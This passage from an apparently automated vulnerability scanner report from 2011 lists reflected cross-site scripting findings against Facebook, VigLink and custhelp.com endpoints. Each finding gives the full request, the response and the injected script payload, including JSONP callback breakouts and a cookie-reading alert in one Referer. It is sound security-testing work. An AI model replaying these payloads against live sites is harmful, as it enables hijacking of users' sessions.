fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats6c818<img src=a onerror=alert(1)>15cd25761cc"},{"key":"urls","value":"[\"http:\/\/news.change.org\/stories\/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi#share_source=blog-top_fb\"]"},{"key":"format","value":"json"},{"key":"callba
...[SNIP]...

3.4. http://api.facebook.com/restserver.php [urls parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied unencoded into the response body. The payload 7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5 was submitted in the urls parameter. This input was echoed as 7250b<img src=a onerror=alert(1)>3afeaa161d5 in the application's response. The same caveat as in 3.3 applies: the response is text/javascript and the value is inside a JSON string, so exploitation depends on the response being rendered as HTML.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Wed, 02 Feb 2011 17:35:11 -0800
Pragma:
X-Cnection: close
Date: Thu, 03 Feb 2011 01:33:11 GMT
Content-Length: 443

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/news.change.org\/stories\/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi#share_source=blog-top_fb\"]7250b<img src=a onerror=alert(1)>3afeaa161d5"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

3.5. http://api.viglink.com/api/click [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the format request parameter is copied unencoded into the response body. The payload 9ff8c<script>alert(1)</script>d0cbfd0ba59 was submitted in the format parameter. This input was echoed unmodified in the application's response. The response is a 400 served as text/plain, so the script only executes in a browser that sniffs the body as HTML; serving such error responses with X-Content-Type-Options: nosniff removes that possibility.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/click?format=jsonp9ff8c<script>alert(1)</script>d0cbfd0ba59&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/plain
Date: Wed, 02 Feb 2011 23:58:36 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 71
Connection: keep-alive

Unrecognized format: 'jsonp9ff8c<script>alert(1)</script>d0cbfd0ba59'

3.6. http://api.viglink.com/api/click [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the jsonp request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7c41%3balert(1)//89d5419dbd6 was submitted in the jsonp parameter. This input was echoed as e7c41;alert(1)//89d5419dbd6 in the application's response. This is a JSONP callback name, so the injected code runs whenever a page loads this URL in a script element with an attacker-influenced jsonp value; navigating to the URL directly only displays the text.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. For a JSONP callback specifically, restrict the name to a strict identifier pattern (letters, digits, underscore, dollar and dots), serve the response as application/javascript with X-Content-Type-Options: nosniff, and JSON-encode the argument.

Request

GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491e7c41%3balert(1)//89d5419dbd6 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:43 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 102
Connection: keep-alive

vglnk_jsonp_12966856382491e7c41;alert(1)//89d5419dbd6('http://www.invisionpower.com/products/nexus/');

3.7. http://api.viglink.com/api/click [out parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the out request parameter is copied unencoded into the response body. The payload 89bf8<script>alert(1)</script>0d35527ef71 was submitted in the out parameter. This input was echoed unmodified in the application's response. In the response shown, the tag lands inside a single-quoted JavaScript string, where it does not execute as script; it is exploitable as HTML only if the text/javascript response is rendered as a document. The quote-breakout variant in 3.8 is the stronger finding for this parameter.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=89bf8<script>alert(1)</script>0d35527ef71&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:41 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 72
Connection: keep-alive

vglnk_jsonp_12966856382491('89bf8<script>alert(1)</script>0d35527ef71');

3.8. http://api.viglink.com/api/click [out parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/click

Issue detail

The value of the out request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 875ad'%3balert(1)//6f691d8d147 was submitted in the out parameter. This input was echoed as 875ad';alert(1)//6f691d8d147 in the application's response. As with 3.6, the code executes when a page includes this JSONP URL as a script with an attacker-influenced out value.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F875ad'%3balert(1)//6f691d8d147&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 23:58:38 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 103
Connection: keep-alive

vglnk_jsonp_12966856382491('http://www.invisionpower.com/products/nexus/875ad';alert(1)//6f691d8d147');

3.9. http://api.viglink.com/api/ping [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 4b46b<script>alert(1)</script>e43aee83162 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966856066450 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 02 Feb 2011 22:26:57 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 97

error: Unknown api key: 4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162

3.10. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e41</script><script>alert(1)</script>a2217655438 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs42e41</script><script>alert(1)</script>a2217655438= HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:42:03 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUx6oW8tRuC50eDPRl97npFuaGOMHZn11NBeN10rkeSZPQgfvVRx_vSuEVGvGk0mz1YIl66klbzDAz4DZ182Z1g2kuAlaPwudchWaGV0lrblKY0vtyrTDDdJ79GQdJGzc8AyEa7pPjYaY2Zu0yuUACJsF%7EJtE%7EioMbnns6N4y50a8cshftqy6qCLau3o8Zwemiu0KpfY0iRiilrQMFwJWssTx%7EYINE1554YiykSPZP7F0IBDazYu6U3ycZMVMfr0QLbP5KPEGQ_vEeZLeda09%7EVPWRykFc8y_ukjAbGNAMFht1JGBgjah0G2TUgQ0nSW75STNcK4H4AQoYJV7UCGSR79sTFZIQONMSPahHDaYJfXgZKzZxTmdV_GJ8hU5tlHR04ytmnxPNqwFRehwSL0RTPnZG3thL%7EVHjHZV56Eb_V85eqHkXObQD0Zm0p10961KoojryKWDSFgzM2niBSNac0fLu7K4LulL54z_WGQJduoFwvteqHRIwoYdAobOou2EW%7ExQ4oFScfPE%21; path=/; httponly
RNT-Time: D=118859 t=1296697323108634
RNT-Machine: 01
F5_do_compression: yes
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 25359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs42e41</script><script>alert(1)</script>a2217655438=');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT_HIERMENU":9,"EUF_DT_INT":5,"EUF_DT_MEMO
...[SNIP]...

3.11. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3aa72</script><script>alert(1)</script>2ea59d67104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?3aa72</script><script>alert(1)</script>2ea59d67104=1 HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:08 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUgRprfxgIlvq96duxnob3hvBaWfagsAGz590%7E%7EFQxYvj6_1w_6mEciwlljmE7zfJtLqRlvR8xervxxoGDYYqCbw4kPUBcZEFoZRmrZw8QTqh4Q3urBb47qoF3Tui%7EDMuuA8SW6x111R8MaPvDpqWLDXbH2fjE%7EjAQJy%7EjpssYasVZ6HH79id9iSiVkOhJWhsMfM4PF1Frjy3wyBiwGBVx8ENPxA2o1dJ0ebJPuv5%7EJLSu504MoxpXxUSQUXU%7EseRXqvR9FJr7oB15DwsOl4WjzTn0NPd0rGO3Fas0MnPCVz9jhd8VYKFNvqPkw9jFjGI5RxmfMPs1cmyuG3nobRb1T%7EEeNs7LFMydaVYBQOOEVJ6jaF1Re9n%7EAnssEQJc50mpLkTRawP6ipl92XTouSftSuWnhiHv2QavJLs2kQPIo4CwPpvMympk9qYSFcWtVh1AzWTOSuaIE967DBi4q0x4h7xmtPl28r4A2IvoxYQCn8Q6%7E7%7EmD%7E3OVgp4HNwqM%7EBqbGGyF1_k2hY%21; path=/; httponly
RNT-Time: D=104396 t=1296697268034941
RNT-Machine: 06
F5_do_compression: yes
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 25362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?3aa72</script><script>alert(1)</script>2ea59d67104=1');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT_HIERMENU":9,"EUF_DT_INT":5,"EUF_DT_MEM
...[SNIP]...

3.12. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of the nsextt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547e6</script><script>alert(1)</script>cf48e18b39c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt=547e6</script><script>alert(1)</script>cf48e18b39c HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: arbor.custhelp.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:09 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUwXGkB0Q%7EkeN19jaCuImlCbnetW3JO6vRIsg9G5758NlYVaItvU5XjD2ZiX_NiVtKaJDalprrVLj6qlLlDnCI6%7Ejjft3YUnrhb1XA3YpbzwIDJ2F2nssc9F%7E_hnpNzWrw2Dt6CUNXAlY07awZQXpFjnrQoevYbR6hnrOq3wMaN9CfgNv1vGgvLQihsfZk4%7EXk_O9C4jhvJQaDoSUVbklHFGqWJ8Ap%7EA2lWYLgQn7Dj7wu5qJSZymKIh2kaAalN_A3S_oJHJCb%7EeyuIvKrxyUp17gHHKbPNbbV6LCP%7E_JdHcR19nH3J2LrLihYSYy9OqJzfMyriuylyjc%21; path=/; httponly
RNT-Time: D=114429 t=1296697269254262
RNT-Machine: 04
F5_do_compression: yes
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 27211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt=547e6</script><script>alert(1)</script>cf48e18b39c');
RightNow.Url.setSession('L3RpbWUvMTI5NjY5NzI2OS9zaWQvakxsSzhGbGs=');
RightNow.Event.setNoSessionCookies(true);
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHE
...[SNIP]...

3.13. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload 607f7<script>alert(1)</script>42eba27e39e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000002)%3C/script%3E607f7<script>alert(1)</script>42eba27e39e HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: arbor.custhelp.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:10 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUAaKWBZ7SvvLxWfp%7EcIQfh7mPnrXi9vTZtK7WkhczqL64yYHQ0QVbkK9RHgawNIjpSCmM0Aeaz122bTrt9oxrYqquIIWDHxoUwafbHRYXpZAj8zBo%7EGLua8qDJQ%7EDYr_BEjDeAjfYtPNjYUGrMUjxkR8PpaOpu3f89vemdlgHGnpoJdFLQxsk675FBV9YqReWb3GFGXX4XBah%7EsnYmD_7SyBdqQzd3Zhql7OBAN1jNOgrekoiQBj_XTw6WLuYQmIdNS_1rGasg88i67O%7E9NukjSidUHv2Jl6I7jQxN%7EqKfSPkOD4ngpoXsEKphUlebl6j_XbSJbRExJ716aGgyN_ZtzCyzQ80dbPwgc7f72dHNu4lA3QTPUPqrVQ5_GsqIpIuQPssVxGn6wl0x3yl1rK6szqG50WB0gAY0_rSruLJlE4Xu%7EmXXJ1_cw%21%21; path=/; httponly
RNT-Time: D=108020 t=1296697270345051
RNT-Machine: 03
F5_do_compression: yes
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 27261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
</script>607f7<script>alert(1)</script>42eba27e39e');
RightNow.Url.setSession('L3RpbWUvMTI5NjY5NzI3MC9zaWQva3l6SzhGbGs=');
RightNow.Event.setNoSessionCookies(true);
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHE
...[SNIP]...

3.14. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b76</script><script>alert(1)</script>ea583b6f0d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance/sessiond9b76</script><script>alert(1)</script>ea583b6f0d9/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
